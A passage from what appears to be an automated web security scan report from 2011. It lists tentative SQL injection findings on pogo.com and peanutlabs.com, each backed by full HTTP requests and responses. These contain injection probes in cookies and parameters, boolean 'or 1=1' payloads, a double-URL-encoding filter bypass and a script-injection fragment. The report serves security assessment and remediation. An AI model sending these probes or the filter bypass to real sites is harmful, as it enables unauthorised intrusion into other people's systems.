Content-Length: 429534


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
reg/signin.do', {
       method : 'get',
       data : 'returnType=&returnValue=' + escape(''),
       onSuccess: function(responseText) {
           var forwardUrl = responseText;
           window.location = forwardUrl;
       },
       onFailure: function () {
           alert('Could not log you in');
           MootoolsUtils.dispose($('fb-reg-signin-backdrop'));
       }
   });
}


</script>
...[SNIP]...
<a href="http://puzzle-games.pogo.com/games/stackem?pageSection=free_home_all_games2_img_stax">
...[SNIP]...

Request 2

GET /home/home.jsp?sls=2&site=pogo HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856%2527%2527; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response 2 (redirected)

HTTP/1.1 302 Moved Temporarily
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Set-Cookie: com.pogo.unid=6606480040167625; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:59:22 GMT; Path=/
Location: http://www.pogo.com/login/entry.jsp?site=pogo&redr=http%3A%2F%2Fwww.pogo.com%2F
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Sun, 09 Jan 2011 02:59:22 GMT
Server: Apache-Coyote/1.1


1.22. http://www.pogo.com/hotdeploy/us/promotions/marketing/pogoiphone/landing-page.jsp [s_cc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pogo.com
Path:   /hotdeploy/us/promotions/marketing/pogoiphone/landing-page.jsp

Issue detail

The s_cc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_cc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /hotdeploy/us/promotions/marketing/pogoiphone/landing-page.jsp HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true'; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response 1

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:59:22 GMT
Server: Apache-Coyote/1.1
Content-Length: 21303


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...
reg/signin.do', {
       method : 'get',
       data : 'returnType=&returnValue=' + escape(''),
       onSuccess: function(responseText) {
           var forwardUrl = responseText;
           window.location = forwardUrl;
       },
       onFailure: function () {
           alert('Could not log you in');
           MootoolsUtils.dispose($('fb-reg-signin-backdrop'));
       }
   });
}


</script>
...[SNIP]...

Request 2

GET /hotdeploy/us/promotions/marketing/pogoiphone/landing-page.jsp HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true''; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response 2

HTTP/1.1 302 Moved Temporarily
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Location: http://www.pogo.com/login/entry.jsp?site=pogo&redr=http%3A%2F%2Fwww.pogo.com%2Fhotdeploy%2Fus%2Fpromotions%2Fmarketing%2Fpogoiphone%2Flanding-page.jsp
Content-Length: 0
Date: Sun, 09 Jan 2011 02:59:23 GMT
Server: Apache-Coyote/1.1


1.23. http://www.pogo.com/img/prize/en_US/cash-giveaway [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pogo.com
Path:   /img/prize/en_US/cash-giveaway

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 19192500'%20or%201%3d1--%20 and 19192500'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /img/prize/en_US/cash-giveaway?119192500'%20or%201%3d1--%20=1 HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response 1

HTTP/1.1 404 /img/prize/en_US/cash-giveaway
Expires: 0
Cache-Control: max-age=0, private
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:58:59 GMT
Server: Apache-Coyote/1.1
Content-Length: 3797


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   <title>
   Pogo:
   Error: Invalid URL
   </title>
   


...[SNIP]...
s.linkTrackVars=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1\'%20and%201%3d1--%20";
s.eVar2="pogo";
s.pageName="ERROR: Invalid URL Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:error::ERROR: Invalid URL Page:Non Authenticated";
s.prop8="Non Authenticated";
if (typeof(omniture_java_version) != "undefined") { s.prop13=omniture_java_version; }
if (typeof(omniture_plugin_used) != "undefined") { s.prop24=omniture_plugin_used; }
s.eVar10=s.getTimeParting('h','-5','2011');
var s_code=s.t();if(s_code)document.write(s_code);
//--></script>
</div>
<!-- end of Omniture Tag -->




<div class="clear20"></div>
<div align="center">
   
   <img src="/vl/img/header/main/en_US/pogo/header-sec-auth-756.jpg" alt="" /><br />
   
       <div id="bodyWrap">
           <div class="whiteModule" id="pageHeader">
               <b class="tL">&nbsp;</b><b class="tR">&nbsp;</b>
               <div class="moduleContent">
                   Oops, something is not right...
               </div>
               <b class="bL">&nbsp;</b><b class="bR">&nbsp;</b>
           </div>
           <div class="clear10"></div>
           <div class="whiteModule mainContent">
               <b class="tL">&nbsp;</b><b class="tR">&nbsp;</b>
               <div class="moduleContent">
                   
<h1>The page you requested could not be found.</h1>

<p>Please check the URL for proper spelling and capitalization. If you're having trouble finding a particular page try visiting the<br />
<strong><a href="http://www.pogo.com/">Pogo.com home page</a></strong> or <strong><a href="http://www.pogo.com/sitemap">sitemap</a></strong>
<div class="clear20"></div>

               </div>
               <b class="bL">&nbsp;</b><b class="bR">&nbsp;</b>
           </div>
       </div>
   

   

</div>
</body>
</html>

Request 2

GET /img/prize/en_US/cash-giveaway?119192500'%20or%201%3d2--%20=1 HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response 2

HTTP/1.1 404 /img/prize/en_US/cash-giveaway
Expires: 0
Cache-Control: max-age=0, private
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:58:59 GMT
Server: Apache-Coyote/1.1
Content-Length: 3784


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   <title>
   Pogo:
   Error: Invalid URL
   </title>
   


...[SNIP]...
s.linkTrackVars=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.pogo.com/?f9258%22%3E%3Cscript%3Ealert(1\'%20and%201%3d1--%20";
s.eVar2="pogo";
s.pageName="ERROR: Invalid URL Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:error::ERROR: Invalid URL Page:Non Authenticated";
s.prop8="Non Authenticated";
if (typeof(omniture_java_version) != "undefined") { s.prop13=omniture_java_version; }
if (typeof(omniture_plugin_used) != "undefined") { s.prop24=omniture_plugin_used; }
s.eVar10=s.getTimeParting('h','-5','2011');
var s_code=s.t();if(s_code)document.write(s_code);
//--></script>
</div>
<!-- end of Omniture Tag -->




<div class="clear20"></div>
<div align="center">
   
   <img src="/vl/img/header/main/en_US/pogo/header-sec-auth-756.jpg" alt="" /><br />
   
       <div id="bodyWrap">
           <div class="whiteModule" id="pageHeader">
               <b class="tL">&nbsp;</b><b class="tR">&nbsp;</b>
               <div class="moduleContent">
                   Oops, something is not right...
               </div>
               <b class="bL">&nbsp;</b><b class="bR">&nbsp;</b>
           </div>
           <div class="clear10"></div>
           <div class="whiteModule mainContent">
               <b class="tL">&nbsp;</b><b class="tR">&nbsp;</b>
               <div class="moduleContent">
                   
<h1>The page you requested could not be found.</h1>

<p>Please check the URL for proper spelling and capitalization. If you're having trouble finding a particular page try visiting the<br />
<strong><a href="http://www.pogo.com/">Pogo.com home page</a></strong> or <strong><a href="http://www.pogo.com/sitemap">sitemap</a></strong>
<div class="clear20"></div>

               </div>
               <b class="bL">&nbsp;</b><b class="bR">&nbsp;</b>
           </div>
       </div>
   

   

</div>
</body>
</html>


1.24. http://www.pogo.com/prize/prize.do [com.pogo.hp.ls.cfg cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pogo.com
Path:   /prize/prize.do

Issue detail

The com.pogo.hp.ls.cfg cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the com.pogo.hp.ls.cfg cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /prize/prize.do?pageSection=footer_prize HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0'; com.pogo.tafrcode=;

Response 1 (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:56:53 GMT
Server: Apache-Coyote/1.1
Content-Length: 25666


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
reg/signin.do', {
       method : 'get',
       data : 'returnType=&returnValue=' + escape(''),
       onSuccess: function(responseText) {
           var forwardUrl = responseText;
           window.location = forwardUrl;
       },
       onFailure: function () {
           alert('Could not log you in');
           MootoolsUtils.dispose($('fb-reg-signin-backdrop'));
       }
   });
}


</script>
...[SNIP]...

Request 2

GET /prize/prize.do?pageSection=footer_prize HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0''; com.pogo.tafrcode=;

Response 2 (redirected)

HTTP/1.1 302 Moved Temporarily
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Location: http://www.pogo.com/login/entry.jsp?site=pogo&redr=http%3A%2F%2Fwww.pogo.com%2Fprize%2Fprize.do%3FpageSection%3Dfooter_prize
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Sun, 09 Jan 2011 01:56:54 GMT
Server: Apache-Coyote/1.1


1.25. http://www.pogo.com/prize/prize.do [op600clubpogoliid cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pogo.com
Path:   /prize/prize.do

Issue detail

The op600clubpogoliid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the op600clubpogoliid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /prize/prize.do?pageSection=footer_prize HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e'; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response 1

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:56:03 GMT
Server: Apache-Coyote/1.1
Content-Length: 25548


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
reg/signin.do', {
       method : 'get',
       data : 'returnType=&returnValue=' + escape(''),
       onSuccess: function(responseText) {
           var forwardUrl = responseText;
           window.location = forwardUrl;
       },
       onFailure: function () {
           alert('Could not log you in');
           MootoolsUtils.dispose($('fb-reg-signin-backdrop'));
       }
   });
}


</script>
...[SNIP]...

Request 2

GET /prize/prize.do?pageSection=footer_prize HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e''; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response 2

HTTP/1.1 302 Moved Temporarily
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Location: http://www.pogo.com/login/entry.jsp?site=pogo&redr=http%3A%2F%2Fwww.pogo.com%2Fprize%2Fprize.do%3FpageSection%3Dfooter_prize
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Sun, 09 Jan 2011 01:56:03 GMT
Server: Apache-Coyote/1.1


1.26. http://www1.peanutlabs.com/peanut-labs-acquired-by-online-research-company-e-rewards-2/ [PHPSESSID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www1.peanutlabs.com
Path:   /peanut-labs-acquired-by-online-research-company-e-rewards-2/

Issue detail

The PHPSESSID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the PHPSESSID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the PHPSESSID cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /peanut-labs-acquired-by-online-research-company-e-rewards-2/ HTTP/1.1
Host: www1.peanutlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_email=test4%40fastdial.net; __utmz=28928570.1294536852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3jamnj3v5les4euhv3rnmsdb04%2527; __utma=28928570.961439791.1294536852.1294536852.1294536852.1; __utmc=28928570; pl_lang=en_US; __utmb=28928570.3.10.1294536852;

Response 1

HTTP/1.1 500 Internal Server Error
Date: Sun, 09 Jan 2011 07:24:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 09 Jan 2011 07:24:43 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 369
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta http-equiv="Conte
...[SNIP]...

Request 2

GET /peanut-labs-acquired-by-online-research-company-e-rewards-2/ HTTP/1.1
Host: www1.peanutlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_email=test4%40fastdial.net; __utmz=28928570.1294536852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3jamnj3v5les4euhv3rnmsdb04%2527%2527; __utma=28928570.961439791.1294536852.1294536852.1294536852.1; __utmc=28928570; pl_lang=en_US; __utmb=28928570.3.10.1294536852;

Response 2

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 07:24:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://www1.peanutlabs.com/xmlrpc.php
Link: <http://www1.peanutlabs.com/?p=568>; rel=shortlink
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29570


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Peanut Labs | Peanut Labs Acquired By E-Rewards
...[SNIP]...

1.27. http://www1.peanutlabs.com/wp-content/plugins/contact-form-7/scripts.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
